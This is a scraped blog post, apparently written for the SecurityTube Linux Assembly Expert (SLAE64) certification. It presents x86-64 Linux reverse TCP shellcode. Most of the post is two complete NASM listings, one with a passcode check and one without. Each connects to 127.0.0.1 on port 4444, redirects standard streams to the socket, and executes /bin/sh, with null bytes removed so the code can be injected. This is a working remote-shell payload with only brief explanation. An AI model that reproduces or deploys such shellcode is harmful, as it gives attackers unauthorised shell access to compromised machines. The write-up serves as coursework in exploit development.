![\"\"](\"http:\/\/hacktarus.fr\/wp-content\/uploads\/2018\/02\/slae64-2-1.png\")
<\/h2>\nThis blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification :<\/p>\n
http:\/\/www.securitytube-\u00adtraining.com\/online-\u00adcourses\/x8664-\u00adassembly-\u00adand-\u00adshellcoding-\u00adon-\u00adlinux\/index.html<\/p>\n
Student ID: PA-6470<\/p>\n
The aim of this assignment is to create a shell reverse TCP shellcode with a passcode and to remove all 0x00 from opcodes.<\/p>\n
First, we need to listen to incoming connections on port 4444 :<\/p>\n
<\/h2>\nThen we launch the shellcode :<\/p>\n
![\"\"](\"http:\/\/hacktarus.fr\/wp-content\/uploads\/2018\/02\/slae64-2-2bis.png\")
<\/h2>\nThe reverse TCP shellcode open a connection on port 4444 and then we access to the \/bin\/sh shell !<\/p>\n
![\"\"](\"http:\/\/hacktarus.fr\/wp-content\/uploads\/2018\/02\/slae64-2-3.png\")
<\/h2>\nHere are the opcodes of this shellcode, as you can see there are no 0x00 :<\/p>\n
![\"\"](\"http:\/\/hacktarus.fr\/wp-content\/uploads\/2018\/02\/slae64-2-4.png\")
<\/p>\n
The passcode code part is exactly the same as the one described in Assignment#1<\/a><\/p>\n One thing about removing 0x00. At some points the original code contains some 0x00 like here :<\/p>\n So I’ve chosen to use a substraction in order to have the same result :<\/p>\n Full source code is available here and on my Github<\/a> account.<\/p>\n This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification : http:\/\/www.securitytube-\u00adtraining.com\/online-\u00adcourses\/x8664-\u00adassembly-\u00adand-\u00adshellcoding-\u00adon-\u00adlinux\/index.html Student ID: PA-6470 Assignment #2 The aim of this assignment is to create a shell reverse TCP shellcode with a passcode and to remove all 0x00 from opcodes. First, we need to listen to incoming connections … Continuer la lecture de SLAE64 – Assignment #2 – Shell Reverse TCP shellcode<\/span><\/a><\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[],"class_list":["post-194","post","type-post","status-publish","format-standard","hentry","category-slae64"],"_links":{"self":[{"href":"https:\/\/hacktarus.fr\/index.php?rest_route=\/wp\/v2\/posts\/194","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/hacktarus.fr\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/hacktarus.fr\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/hacktarus.fr\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/hacktarus.fr\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=194"}],"version-history":[{"count":10,"href":"https:\/\/hacktarus.fr\/index.php?rest_route=\/wp\/v2\/posts\/194\/revisions"}],"predecessor-version":[{"id":297,"href":"https:\/\/hacktarus.fr\/index.php?rest_route=\/wp\/v2\/posts\/194\/revisions\/297"}],"wp:attachment":[{"href":"https:\/\/hacktarus.fr\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=194"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/hacktarus.fr\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=194"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/hacktarus.fr\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=194"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}mov dword [rsp-4], 0x0100007f<\/pre>\n
;mov dword [rsp-4], 0x0100007f\r\nmov dword [rsp -4], 0x9A999A18\r\nsub dword [rsp -4], 0x99999999<\/pre>\n
Source code of Reverse-Shell-Passcode-Safe.nasm<\/h2>\n
; This shellcode has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification :\r\n; http:\/\/www.securitytube-training.com\/online-courses\/x8664-assembly-and-shellcoding-on-linux\/index.html\r\n;\r\n; Author : SLAE64-PA-6470 (kahlon81)\r\n; Date : 2018\/02\/21\r\n;\r\n; nasm -f elf64 Reverse-Shell-Passcode-Safe.nasm -o Reverse-Shell-Passcode-Safe.o\r\n; ld Reverse-Shell-Passcode-Safe.o -o Reverse-Shell-Passcode-Safe\r\n\r\nglobal _start\r\n\r\nsection .bss\r\n buffer resb 20 ; buffer of 20 bytes\r\n buffer_size equ $ - buffer ; buffer size\r\n \r\nsection .data\r\n passcode: db 'pwd',0x0a\r\n passcode_required: db '#passcode : '\r\n passcode_required_size equ $ - passcode_required\r\n\r\nsection .text\r\n_start:\r\n\r\n\t; sock = socket(AF_INET, SOCK_STREAM, 0)\r\n\t; AF_INET = 2\r\n\t; SOCK_STREAM = 1\r\n\t; syscall number 41 \r\n\r\n\txor rax, rax\r\n\tadd al, 41\r\n\t\r\n\txor rdi, rdi\r\n\tinc dil\r\n\tinc dil\r\n\r\n\txor rsi, rsi\r\n\tinc sil\t\r\n\r\n\txor rdx, rdx\r\n\tsyscall\r\n\r\n\t; copy socket descriptor to rdi for future use \r\n\r\n\tmov rdi, rax\r\n\r\n\r\n\t; server.sin_family = AF_INET \r\n\t; server.sin_port = htons(PORT)\r\n\t; server.sin_addr.s_addr = inet_addr(\"127.0.0.1\")\r\n\t; bzero(&server.sin_zero, 8)\r\n\r\n\txor rax, rax \r\n\r\n\tpush rax\r\n\t\r\n\t;mov dword [rsp-4], 0x0100007f\r\n\tmov dword [rsp -4], 0x9A999A18\r\n\tsub dword [rsp -4], 0x99999999\r\n\r\n\tmov word [rsp-6], 0x5c11\r\n\t\r\n\t;mov word [rsp-8], 0x2\r\n mov word [rsp-8], 0x1FF\r\n sub word [rsp-8], 0x1FD\r\n\r\n\tsub rsp, 8\r\n\r\n\r\n\t; connect(sock, (struct sockaddr *)&server, sockaddr_len)\r\n\t\r\n\txor rax, rax\r\n\tadd al, 42\r\n\r\n\tmov rsi, rsp\r\n\t\r\n\txor rdx, rdx\r\n\tadd dl, 16\t\r\n\r\n\tsyscall\r\n\r\n\r\n ; duplicate sockets\r\n\r\n ; dup2 (new, old)\r\n \r\n\txor rax, rax\r\n\tadd al, 33\r\n\r\n xor rsi, rsi\r\n\tsyscall\r\n\r\n xor rax, rax\r\n\tadd al, 33\r\n\r\n xor rsi, rsi\r\n\tinc sil\r\n\r\n\tsyscall\r\n\r\n xor rax, rax\r\n\tadd al, 33\r\n\r\n xor rsi, rsi\r\n\tinc sil\r\n\tinc sil\t\r\n\r\n\tsyscall\r\n\r\n\r\n\t; passcode is required\r\n\r\n\txor rdx, rdx\r\n\tmov dl, passcode_required_size\r\n\r\n\t;mov rsi, passcode_required\r\n\tpush 0x203a2065\t\t\t; #passcode : \r\n\tmov rbx, 0x646f637373617023\t; #passcode : \r\n\tpush rbx\r\n\tmov rsi, rsp \r\n\r\n\txor rdi, rdi\r\n\tmov dil, 1 ; stdout\r\n xor rax, rax\r\n\tmov al, 1 ; sys_write\r\n\tsyscall\t\r\n\r\n\t; user input\r\n \r\n\t;mov rdx, buffer_size\r\n xor rdx, rdx\r\n\tmov dl, buffer_size\t\r\n\r\n\t;mov rsi, buffer\r\n mov rbx, 0x0101010101010101\r\n\tpush rbx\r\n\tmov rsi, rsp\r\n\r\n\txor rdi, rdi ; stdin\r\n xor rax, rax \r\n\tsyscall ; sys_read\r\n\r\n\t; check passcode \r\n\t\r\n\t;lea rsi, [buffer] ; user passcode\r\n\t;mov rsi, buffer\r\n\r\n\t;lea rdi, [passcode] ; true passcode\r\n\t;mov rdi, passcode\r\n\tpush 0x0a647770\t\t; pwd0x0a\r\n\tmov rdi, rsp\r\n\r\n\txor rcx, rcx \r\n\tdec rcx\r\ncmp_pwd:\r\n\tinc rcx\r\n mov al, byte [rsi + rcx]\r\n\tmov dl, byte [rdi + rcx]\r\n\tcmp al, dl ; compare each character\r\n jne exit ; jump out of loop if they are not the same\r\n\tcmp dl, 0x0a ; end of string ?\r\n\tjne cmp_pwd ; not finished, loop again\r\n\r\n\r\n ; execve\r\n\r\n ; First NULL push\r\n\r\n xor rax, rax\r\n push rax\r\n\r\n ; push \/bin\/\/sh in reverse\r\n\r\n mov rbx, 0x68732f2f6e69622f\r\n push rbx\r\n\r\n ; store \/bin\/\/sh address in RDI\r\n\r\n mov rdi, rsp\r\n\r\n ; Second NULL push\r\n push rax\r\n\r\n ; set RDX\r\n mov rdx, rsp\r\n\r\n ; Push address of \/bin\/\/sh\r\n push rdi\r\n\r\n ; set RSI\r\n\r\n mov rsi, rsp\r\n\r\n ; Call the Execve syscall\r\n add rax, 59\r\n syscall\r\n \r\nexit:\r\n\txor rdi, rdi\r\n\tadd dil, 1\r\n\txor rax, rax\r\n\tadd al, 60\r\n syscall\r\n<\/pre>\n
Source code of Reverse-Shell-Safe.nasm :<\/h2>\n
; This shellcode has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification :\r\n; http:\/\/www.securitytube-training.com\/online-courses\/x8664-assembly-and-shellcoding-on-linux\/index.html\r\n;\r\n; Author : SLAE64-PA-6470 (kahlon81)\r\n; Date : 2018\/02\/21\r\n;\r\n; nasm -f elf64 Reverse-Shell-Safe.nasm -o Reverse-Shell-Safe.o\r\n; ld Reverse-Shell-Safe.o -o Reverse-Shell-Safe\r\n\r\nglobal _start\r\n\r\n\r\n_start:\r\n\r\n\t; sock = socket(AF_INET, SOCK_STREAM, 0)\r\n\t; AF_INET = 2\r\n\t; SOCK_STREAM = 1\r\n\t; syscall number 41 \r\n\r\n\txor rax, rax\r\n\tadd al, 41\r\n\t\r\n\txor rdi, rdi\r\n\tinc dil\r\n\tinc dil\r\n\r\n\txor rsi, rsi\r\n\tinc sil\t\r\n\r\n\txor rdx, rdx\r\n\tsyscall\r\n\r\n\t; copy socket descriptor to rdi for future use \r\n\r\n\tmov rdi, rax\r\n\r\n\r\n\t; server.sin_family = AF_INET \r\n\t; server.sin_port = htons(PORT)\r\n\t; server.sin_addr.s_addr = inet_addr(\"127.0.0.1\")\r\n\t; bzero(&server.sin_zero, 8)\r\n\r\n\txor rax, rax \r\n\r\n\tpush rax\r\n\t\r\n\t;mov dword [rsp-4], 0x0100007f\r\n\tmov dword [rsp -4], 0x9A999A18\r\n\tsub dword [rsp -4], 0x99999999\r\n\r\n\tmov word [rsp-6], 0x5c11\r\n\t\r\n\t;mov word [rsp-8], 0x2\r\n mov word [rsp-8], 0x1FF\r\n sub word [rsp-8], 0x1FD\r\n\r\n\tsub rsp, 8\r\n\r\n\r\n\t; connect(sock, (struct sockaddr *)&server, sockaddr_len)\r\n\t\r\n\txor rax, rax\r\n\tadd al, 42\r\n\r\n\tmov rsi, rsp\r\n\t\r\n\txor rdx, rdx\r\n\tadd dl, 16\t\r\n\r\n\tsyscall\r\n\r\n\r\n ; duplicate sockets\r\n\r\n ; dup2 (new, old)\r\n \r\n\txor rax, rax\r\n\tadd al, 33\r\n\r\n xor rsi, rsi\r\n\tsyscall\r\n\r\n xor rax, rax\r\n\tadd al, 33\r\n\r\n xor rsi, rsi\r\n\tinc sil\r\n\r\n\tsyscall\r\n\r\n xor rax, rax\r\n\tadd al, 33\r\n\r\n xor rsi, rsi\r\n\tinc sil\r\n\tinc sil\t\r\n\r\n\tsyscall\r\n\r\n\r\n ; execve\r\n\r\n ; First NULL push\r\n\r\n xor rax, rax\r\n push rax\r\n\r\n ; push \/bin\/\/sh in reverse\r\n\r\n mov rbx, 0x68732f2f6e69622f\r\n push rbx\r\n\r\n ; store \/bin\/\/sh address in RDI\r\n\r\n mov rdi, rsp\r\n\r\n ; Second NULL push\r\n push rax\r\n\r\n ; set RDX\r\n mov rdx, rsp\r\n\r\n ; Push address of \/bin\/\/sh\r\n push rdi\r\n\r\n ; set RSI\r\n\r\n mov rsi, rsp\r\n\r\n ; Call the Execve syscall\r\n add rax, 59\r\n syscall\r\n \r\n\r\n<\/pre>\n","protected":false},"excerpt":{"rendered":"